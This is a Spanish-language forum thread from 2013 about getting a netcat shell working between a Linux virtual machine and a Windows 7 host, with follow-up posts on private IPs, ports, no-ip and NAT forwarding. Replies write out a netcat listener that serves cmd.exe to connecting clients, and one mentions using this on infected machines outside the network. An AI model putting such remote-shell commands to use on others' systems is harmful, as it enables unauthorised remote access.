como utilizo netcat y SSL desde una maquina virtual? que IP poner?

Synth3tik0 · 18 Enero 2013, 01:09 AM

quiero hacer un netcat inverso desde la maquina virtual que corre linux y que se conecte a mi maquina principal que usa windows 7 . Tengo el vmware player. Tengo que colocar mi ip publica en el netcat o la ip local que me asigno el router? he probado con ambas pero me manda un conexion refused

.Asumo que si no se va conectar desde el exterior no hay necesidad de abrir puertos en el router verdad? alguna idea o solucion?

RevangelyonX · 18 Enero 2013, 13:45 PM

Hola,

Las máquinas se ven entre ellas?

Tu windows tiene que tener netcat así:
Nc -vnlp 4444 -e cmd.exe

Tu linux
Nc -nv ip.win7 4444

Esto te devuelve una reverse shell en tu linux. Es decir accederas al cmd.exe de win desde tu linux.

Salu2

Pd: se m olvidava
ips locales

kub0x · 18 Enero 2013, 13:52 PM

Eso es. A modo local solo tienes que tener en cuenta la IP privada. En cambio si infectaras una máquina que está fuera de tu red, deberías abrir puertos y hacer que esa máquina se conecte a tí, es decir, tu deberías aceptar cualquier conexión en el puerto sobre el que estás escuchando para de esta forma obtener la shell remota.

La manera que ha puesto RevangelyonX es la forma correcta de emplear la conexión inversa, aunque el parámetro -l significa que la Shell escuchará una vez y -L que escucará siempre.

Saludos!

RevangelyonX · 18 Enero 2013, 13:57 PM

Hola,

Muy cierto kub0x es que netcat de linux no tiene ese parametro.
Gracias por recalcarlo

Salu2

Synth3tik0 · 19 Enero 2013, 03:29 AM

y por ejemplo si ejecuto dos noIP al mismo tiempo, uno en mi maquina virtual y otro en la maquina principal. Segun yo tengo entendido que no puedo "anclar" dos o mas programas al mismo puerto, pero que pasaria si pusiera a la escucha el netcat en el puerto ejm (500) tanto en la maquina virtual con en la maquina principal, cual de los dos recibiria la conexion?

MauroMasciar · 19 Enero 2013, 04:06 AM

Cita de: ๖ۣۜPﾑ||ﾑđ1ůɱ en 19 Enero 2013, 03:29 AM
y por ejemplo si ejecuto dos noIP al mismo tiempo, uno en mi maquina virtual y otro en la maquina principal. Segun yo tengo entendido que no puedo "anclar" dos o mas programas al mismo puerto, pero que pasaria si pusiera a la escucha el netcat en el puerto ejm (500) tanto en la maquina virtual con en la maquina principal, cual de los dos recibiria la conexion?

Tendrías escuchando el NC en una PC en el puerto 500 y en la virtual en su puerto 500, no pasa nada raro.
Cuando te quieras conectar especificas IP y Puerto. (Ip privada, obviamente)
Lo "malo" es cuando dos programas quieren usar un mismo puerto en una misma PC.

Y el No-ip hasta donde yo se, redirige el nombre a tu ip pública, así que desde una maquina exterior te conectaría a la PC que tenga el puerto abierto.

RevangelyonX · 19 Enero 2013, 16:40 PM

Aqui hay un problema de conceptos.
Si tu tienes una maquina virtual es como tener una maquina mas. Suponiendo que tengas la iface en modo bridge tienes una ip mas en tu rango por lo tanto tienes

1.100 maquina fisica
1.102 la virtual por ejemplo

Utilizar no-ip es para crear un nombre de dominio asociado a tu IP publica. Asi pues tienes que crear un fordward / natting hacia una de las ips privadas. Sólo pasaras hacia una IP privada.

Es un tema de configurar tu router / firrwall.

Salu2